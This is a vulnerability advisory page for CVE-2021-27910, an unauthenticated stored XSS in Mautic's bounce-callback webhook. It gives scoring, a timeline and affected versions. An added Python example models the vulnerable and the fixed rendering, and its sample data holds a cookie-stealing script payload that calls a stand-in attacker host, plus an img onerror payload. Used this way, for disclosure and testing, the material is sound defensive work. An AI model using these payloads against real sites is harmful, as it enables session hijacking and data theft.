
CVE-2021-27910

Stored XSS vulnerability on Bounce Management Callback

Severity Score

6.1
*CVSS v3.1

Exploit Likelihood

*EPSS

Affected Versions

*CPE

Public Exploits

0
*Multiple Sources

Exploited in Wild

-
*KEV

Decision

-
*SSVC

Descriptions

Insufficient sanitization / filtering allows arbitrary JavaScript injection in Mautic through the bounce management callback function. The values submitted in the "error" and "error_related_to" parameters of the bounce management callback's POST request are stored permanently and executed once the details page of an affected lead is opened by a Mautic user. An attacker with access to the bounce management callback function (identified with the Mailjet webhook, but it is assumed this will work uniformly across all kinds of webhooks) can inject arbitrary JavaScript code into the "error" and "error_related_to" parameters of the POST request (POST /mailer/<product / webhook>/callback). Note that no authentication is needed to access this function. The JavaScript code is stored permanently in the web application and executed every time an authenticated user views the details page of a single contact / lead in Mautic. This means arbitrary code can be executed in that user's browser session to, e.g., steal or tamper with information.
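The two halves of the chain described above (unauthenticated storage of the webhook's "error" / "error_related_to" values, then unencoded rendering on the contact detail page) can be modelled and regression-tested outside Mautic. The following is an added illustration, not Mautic's code: the Lead record, the handler, the two render functions and the callback body are all constructed for this example, and the JavaScript payload is illustrative rather than taken from the advisory. It shows the vulnerable sink next to the fixed one (HTML-entity encoding at the output point, which is the CWE-79 remedy) and a check that counts how many tags in the rendered page originate from the stored fields.

```python
import html
import re
from dataclasses import dataclass

# Constructed sample of a bounce-callback POST body in the shape the advisory
# describes ("error" and "error_related_to" parameters). Illustrative payload,
# not a real Mailjet event and not taken from the advisory.
SAMPLE_CALLBACK = {
    "email": "lead@example.com",
    "error": '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    "error_related_to": '"><img src=x onerror=alert(document.domain)>',
}


@dataclass
class Lead:
    """Hypothetical contact record; the field names are assumptions, not Mautic's schema."""
    email: str
    bounce_error: str = ""
    bounce_error_related_to: str = ""


def handle_bounce_callback(leads, body):
    """Model of the unauthenticated webhook handler: stores the submitted values
    verbatim. This is the storage half of the stored-XSS chain the advisory describes."""
    lead = leads.setdefault(body["email"], Lead(body["email"]))
    lead.bounce_error = body.get("error", "")
    lead.bounce_error_related_to = body.get("error_related_to", "")
    return lead


def render_detail_vulnerable(lead):
    """Sink: untrusted stored values interpolated into HTML without encoding."""
    return (f"<p>Email bounced: {lead.bounce_error} "
            f"(related to: {lead.bounce_error_related_to})</p>")


def render_detail_fixed(lead):
    """Same view with HTML-entity encoding applied at the output point.
    quote=True also encodes quotes, so the value stays inert inside attribute values."""
    return "<p>Email bounced: {} (related to: {})</p>".format(
        html.escape(lead.bounce_error, quote=True),
        html.escape(lead.bounce_error_related_to, quote=True),
    )


# Matches the start of an HTML tag: '<', optional '/', then a letter.
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z]")


def injected_tag_count(render, lead):
    """Regression check: number of HTML tags in the rendered page that come from
    the stored fields rather than from the template. Renders the same template
    with empty fields as a baseline and subtracts its tag count."""
    baseline = Lead(lead.email)
    return len(TAG_RE.findall(render(lead))) - len(TAG_RE.findall(render(baseline)))


if __name__ == "__main__":
    leads = {}
    lead = handle_bounce_callback(leads, SAMPLE_CALLBACK)
    print("injected tags, vulnerable view:", injected_tag_count(render_detail_vulnerable, lead))
    print("injected tags, fixed view:     ", injected_tag_count(render_detail_fixed, lead))
    print(render_detail_fixed(lead))
```

The check is deliberately placed at the rendering layer: because the callback is reachable without authentication, input-side filtering on the webhook alone cannot be relied on, and any other view that later displays the same stored fields would need the same output encoding.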


*Credits: Fixed by Zdeno Kuzmany, Webmecanik

CVSS Scores

CVSS v3.1 (base score 6.1): CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

CVSS v3.1, second vector (base score 8.2): CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: High
Availability: None

CVSS v2 (base score 4.3): AV:N/AC:M/Au:N/C:N/I:P/A:N
Attack Vector: Network
Attack Complexity: Medium
Authentication: None
Confidentiality: None
Integrity: Partial
Availability: None
* Common Vulnerability Scoring System

SSVC
  • Decision: -
  • Exploitation: -
  • Automatable: -
  • Tech. Impact: -
* Organization's Worst-case Scenario
Timeline
  • 2021-03-02 CVE Reserved
  • 2021-08-30 CVE Published
  • 2024-05-15 EPSS Updated
  • 2024-09-17 CVE Updated
  • ---------- Exploited in Wild
  • ---------- KEV Due Date
  • ---------- First Exploit
CWE
  • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CAPEC
Affected Vendors, Products, and Versions

Vendor   Product   Version   Other    Status
Acquia   Mautic    < 3.3.4   -        Affected
Acquia   Mautic    4.0.0     alpha1   Affected
Acquia   Mautic    4.0.0     beta     Affected
Acquia   Mautic    4.0.0     rc       Affected